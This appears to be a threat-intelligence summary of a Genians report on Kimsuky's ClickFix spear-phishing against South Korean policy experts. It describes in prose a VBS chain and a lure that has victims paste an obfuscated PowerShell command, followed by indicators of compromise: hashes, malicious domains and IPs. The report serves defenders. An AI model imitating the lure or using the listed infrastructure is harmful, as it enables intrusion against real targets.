Analysis of the threat case of kimsuky group using 'ClickFix' tactic

2025-07-01 Genians

https://www.genians.co.kr/en/blog/threat_intelligence/suky-castle

Thumbnail for Analysis of the threat case of kimsuky group using 'ClickFix' tactic

Genians links early 2025 ClickFix activity to Kimsuky and assesses it as an extension of the group's BabyShark campaign. The activity targeted South Korean experts in diplomacy, national security, and international politics through sustained spear-phishing, including impersonation of journalists and an aide to a senior U.S. national security official. One infection chain delivered an encrypted archive containing a malicious VBS file that opened a decoy document, downloaded from konamo.xyz, established persistence with a scheduled task, collected process and user details, and contacted a BabyShark-pattern C2 endpoint. A later variant replaced the VBS delivery with a ClickFix-style secure-document lure that instructed users to copy and paste an authentication code into PowerShell, using reverse-order obfuscation to hide the executed command. The report shows Kimsuky adapting public ClickFix tradecraft into targeted social-engineering operations against South Korean policy-focused targets.

Indicators of Compromise

Type Value First Seen Last Seen
HASH 0a9c22079c898fc112e67ce1caff8f54 2025-07-01 2025-07-01
HASH fcde319b752cacec40ffba130067de0d 2025-07-01 2025-07-01
HASH ad6104a503b46bf6ea505fe8b3182970 2025-07-01 2025-07-01
HASH d10208c32fbbb5cacbd2097fc0dcd444 2025-07-01 2025-07-01
HASH bf795a376233032d05766a396b3d6e08 2025-07-01 2025-07-01
HASH 56233bac07f4f9c43585e485e70b6169 2025-07-01 2025-07-01
HASH 8ff155a2962c77e9da05bd0476af36be 2025-07-01 2025-07-01
HASH 627b856884604880a5c009ebf7173efb 2025-07-01 2025-07-01
HASH 8c33e8439844c315b7b3f21b0c1633aa 2025-07-01 2025-07-01
HASH ca13c54987293ae7efc22b14e1153c1e 2025-07-01 2025-07-01
HASH 40ce5cf6be259120d179f51993aec854 2025-07-01 2025-07-01
HASH fc4c319d7940ad1b7c0477469420bd11 2025-07-01 2025-07-01
HASH 3297e3606d6466bc7f741a4df2b9e96a 2025-07-01 2025-07-01
DOMAIN login.androclesproject.o-r.kr 2025-07-01 2025-07-01
DOMAIN voanews.co.com 2025-07-01 2025-07-01
DOMAIN mspro.kro.kr 2025-07-01 2025-07-01
DOMAIN msprovider.menews.o-r.kr 2025-07-01 2025-07-01
DOMAIN nid.naver.rkfd.com 2025-07-01 2025-07-01
DOMAIN konamo.xyz 2025-07-01 2025-07-01
DOMAIN securedrive-overseas-state.bit-… 2025-07-01 2025-07-01
DOMAIN kida.plusdocs.kro.kr 2025-07-01 2025-07-01
DOMAIN e-securedrive.assembly.twoon.co… 2025-07-01 2025-07-01
DOMAIN online.lecture-site.kro.kr 2025-07-01 2025-07-01
IPv4 162.0.229.227 2025-07-01 2025-07-01
IPv4 1.223.129.234 2025-07-01 2025-07-01
IPv4 106.243.157.158 2025-07-01 2025-07-01
IPv4 211.170.73.245 2025-07-01 2025-07-01
IPv4 112.74.194.45 2025-07-01 2025-07-01
IPv4 103.149.98.248 2025-07-01 2025-07-01
IPv4 118.193.69.151 2025-07-01 2025-07-01
IPv4 157.7.184.11 2025-07-01 2025-07-01
HASH a523bf5dca0f2a4ace0cf766d9225343 2025-05-19 2025-07-01
HASH 12bfe00206b2e83c7ff79b657d3c56df 2025-05-19 2025-07-01
HASH 913fe4236ca5e34879d2a3228da6b9c6 2025-05-19 2025-07-01
HASH 89a725b08ab0e8885fc03b543638be96 2025-04-18 2025-07-01
IPv4 103.149.98.247 2025-04-18 2025-07-01
DOMAIN securedrive.fin-tech.com 2025-04-17 2025-07-01
DOMAIN accounts-porfile.serveirc.com 2025-04-17 2025-07-01
DOMAIN account-profile.servepics.com 2025-04-17 2025-07-01
DOMAIN securedrive.servehttp.com 2025-04-17 2025-07-01
DOMAIN securedrive.privatedns.org 2025-04-17 2025-07-01
IPv4 210.179.30.213 2025-04-17 2025-07-01
IPv4 115.92.4.123 2025-04-17 2025-07-01
IPv4 118.194.228.184 2025-04-17 2025-07-01
IPv4 121.179.161.231 2025-04-17 2025-07-01
IPv4 172.86.111.75 2025-04-17 2025-07-01
IPv4 38.180.157.197 2025-04-17 2025-07-01
DOMAIN temuco.xyz 2024-10-04 2025-07-01
IPv4 65.254.248.151 2024-09-17 2025-07-01

Related Actors

Related Reports

« Back